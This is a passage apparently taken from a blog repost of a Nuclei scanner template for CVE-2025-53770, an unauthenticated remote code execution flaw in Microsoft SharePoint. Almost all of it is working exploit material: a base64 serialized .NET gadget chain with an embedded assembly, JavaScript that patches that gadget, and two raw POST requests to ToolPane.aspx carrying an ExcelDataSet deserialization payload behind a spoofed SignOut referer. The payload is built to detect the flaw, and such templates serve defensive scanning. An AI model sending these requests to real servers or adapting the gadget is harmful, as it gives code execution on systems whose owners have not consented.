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9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQEgAAAAcAAAAJBAAAAAoJKAAAAAoICAAAAAAKCAgBAAAAARMAAAAPAAAABikAAADfA1N5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBQAAAAHAAAACQUAAAAKCSwAAAAKCAgAAAAACggIAQAAAAEVAAAADwAAAAYtAAAA5gJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBYAAAAHAAAACQYAAAAJMAAAAAkxAAAACggIAAAAAAoICAEAAAABFwAAAA8AAAAGMgAAAO8BU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQGAAAAAcAAAAJBwAAAAoJNQAAAAoICAAAAAAKCAgBAAAAARkAAAAPAAAABjYAAAApU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5QYWdlZERhdGFTb3VyY2UEAAAABjcAAABKU3lzdGVtLldlYixWZXJzaW9uPTQuMC4wLjAsQ3VsdHVyZT1uZXV0cmFsLFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EQGgAAAAcAAAAJCAAAAAgIAAAAAAgICgAAAAgBAAgBAAgBAAgIAAAAAAEbAAAADwAAAAY5AAAAKVN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uRGVzaWduZXJWZXJiBAAAAAY6AAAARlN5c3RlbSxWZXJzaW9uPTQuMC4wLjAsQ3VsdHVyZT1uZXV0cmFsLFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHAAAAAUAAAANAgk7AAAACAgDAAAACQsAAAABHQAAAA8AAAAGPQAAADRTeXN0ZW0uUnVudGltZS5SZW1vdGluZy5DaGFubmVscy5BZ2dyZWdhdGVEaWN0aW9uYXJ5BAAAAAY+AAAACG1zY29ybGliEB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAAA7U3lzdGVtLkZ1bmNgMltbU3lzdGVtLkJ5dGVbXV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XV0JPgAAAAoJPgAAAAZSAAAAGlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5BlMAAAAETG9hZAoEQwAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgYAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAAMIDVN5c3RlbS5UeXBlW10JUwAAAAk+AAAACVIAAAAGVgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgFEAAAAQgAAAAZXAAAAZVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGVdXV1dCT4AAAAKCT4AAAAJUgAAAAZaAAAACEdldFR5cGVzCgFFAAAAQwAAAAlaAAAACT4AAAAJUgAAAAZdAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQgAAAAKAUYAAABCAAAABl4AAACCAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlXV1dLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZV1dXV0JPgAAAAoJPgAAAAZgAAAAN1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlXV0GYQAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAlhAAAACT4AAAAJYAAAAAZkAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQgAAAAKAUgAAABCAAAABmUAAABZU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGVdXV0sW1N5c3RlbS5Cb29sZWFuXV0JPgAAAAoJPgAAAAZnAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZoAAAACE1vdmVOZXh0CgFJAAAAQwAAAAloAAAACT4AAAAJZwAAAAZrAAAAEkJvb2xlYW4gTW92ZU5leHQoKQgAAAAKAUoAAABCAAAABmwAAABWU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGVdXV0sW1N5c3RlbS5UeXBlXV0JPgAAAAoJPgAAAAZuAAAAN1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlXV0GbwAAAAtnZXRfQ3VycmVudAoBSwAAAEMAAAAJbwAAAAk+AAAACW4AAAAGcgAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGcwAAACxTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uVHlwZV0sW1N5c3RlbS5PYmplY3RdXQk+AAAACgk+AAAABnUAAAAQU3lzdGVtLkFjdGl2YXRvcgZ2AAAADkNyZWF0ZUluc3RhbmNlCgFNAAAAQwAAAAl2AAAACT4AAAAJdQAAAAZ5AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpCAAAAAoBTgAAAA8AAAAGegAAACZTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkNvbW1hbmRJRAQAAAAJOgAAABBPAAAAAgAAAAl8AAAACAgAIAAABHwAAAALU3lzdGVtLkd1aWQLAAAAAl9hAl9iAl9jAl9kAl9lAl9mAl9nAl9oAl9pAl9qAl9rAAAAAAAAAAAAAAAIBwcCAgICAgICAhMT0nTuKtERi/sAoMkPJvcL'


flow: javascript() && http(1)
javascript:
  - code: |
          const bytess = require("nuclei/bytes");

          function u8(arr) { return new Uint8Array(arr); }

          // String → Buffer (binary-safe)
          function strToBuf(str) {
            var b = new bytes.Buffer();
            b.WriteString(str);
            return b;
          }
          // 7-bit int encoding (like .NET BinaryWriter)
          function encode7BitInt(n) {
            if (n === 0) return new bytes.Buffer(u8([0]));
            var tmp = [];
            while (n > 0) {
              var v = n & 0x7F;
              n >>>= 7;
              if (n > 0) v |= 0x80;
              tmp.push(v);
            }
            return new bytes.Buffer(u8(tmp));
          }
          // Replace all occurrences of needle(Buffer) with repl(Buffer) in hay(Buffer)
          function replaceAllBytes(hay, needle, repl) {
            var H = hay.Bytes();
            var N = needle.Bytes();
            var out = new bytes.Buffer();

            for (var i = 0; i < H.length;) {
              var match = true;
              for (var j = 0; j < N.length; j++) {
                if (i + j >= H.length || H[i + j] !== N[j]) { match = false; break; }
              }
              if (match) {
                out.Write(repl.Bytes());
                i += N.length;
              } else {
                out.Write(u8([H[i]]));     // <-- IMPORTANT: Uint8Array, not plain []
                i++;
              }
            }
            return out;
          }
          dataset_gadget_raw = strToBuf(atob(dg));
          dataset_gadget_raw1 = replaceAllBytes(
            dataset_gadget_raw,
            strToBuf("HAX"),
            strToBuf(ig)
          );
          dataset_gadget_raw2 = replaceAllBytes(
            dataset_gadget_raw,
            strToBuf("HAX"),
            strToBuf(ig2)
          );
          var oldLen = encode7BitInt(9163);
          var newLen = encode7BitInt(9163 - 7772 + ig.length);
          var newLen2 = encode7BitInt(9163 - 7772 + ig2.length);
          dataset_gadget_raw1 = replaceAllBytes(dataset_gadget_raw1, oldLen, newLen);
          dataset_gadget_raw2 = replaceAllBytes(dataset_gadget_raw2, oldLen, newLen2);
          (btoa(dataset_gadget_raw1.String()) + ":" + btoa(dataset_gadget_raw2.String()))

    args:
      ig: "{{internal_gadget_b64}}"
      ig2: "{{internal_gadget2_b64}}"
      dg: "{{dataset_gadget_b64}}"

http:
  - raw:
      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: /_layouts/SignOut.aspx
        Accept-Encoding: gzip

        MSOTlPn_Uri={{Scheme}}%3a//{{Hostname}}/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP=%3c%25%40%20Register%20Tagprefix%3d%22gizpnozlcjfutvbn%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%3c%25%40%20Register%20Tagprefix%3d%22sjqjboucouuj%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%3cgizpnozlcjfutvbn%3aUpdateProgress%3e%0a%20%20%20%20%3cProgressTemplate%3e%0a%20%20%20%20%20%20%3csjqjboucouuj%3aExcelDataSet%20CompressedDataTable%3d%22{{urlencode(base64(gzip(base64_decode(replace_regex(javascript_response,":.*","")))))}}%22%20DataTable-CaseSensitive%3d%22true%22%20runat%3d%22server%22/%3e%0a%20%20%20%20%3c/ProgressTemplate%3e%0a%20%20%3c/gizpnozlcjfutvbn%3aUpdateProgress%3e%0a

      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: /_layouts/SignOut.aspx
        Accept-Encoding: gzip

        MSOTlPn_Uri={{Scheme}}%3a//{{Hostname}}/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP=%3c%25%40%20Register%20Tagprefix%3d%22gizpnozlcjfutvbn%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%3c%25%40%20Register%20Tagprefix%3d%22sjqjboucouuj%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%3cgizpnozlcjfutvbn%3aUpdateProgress%3e%0a%20%20%20%20%3cProgressTemplate%3e%0a%20%20%20%20%20%20%3csjqjboucouuj%3aExcelDataSet%20CompressedDataTable%3d%22{{urlencode(base64(gzip(base64_decode(replace_regex(javascript_response,".*:","")))))}}%22%20DataTable-CaseSensitive%3d%22true%22%20runat%3d%22server%22/%3e%0a%20%20%20%20%3c/ProgressTemplate%3e%0a%20%20%3c/gizpnozlcjfutvbn%3aUpdateProgress%3e%0a

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(x_nuclei,"CVE-2025-53770")'
          - 'contains(body, "MSOTlPn_DWP")'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #反序列化
Microsoft SharePoint Server Remote Code Execution Vulnerability
http://example.com/2025/07/24/github_1158677871/
作者
lianccc
发布于
2025年7月24日
许可协议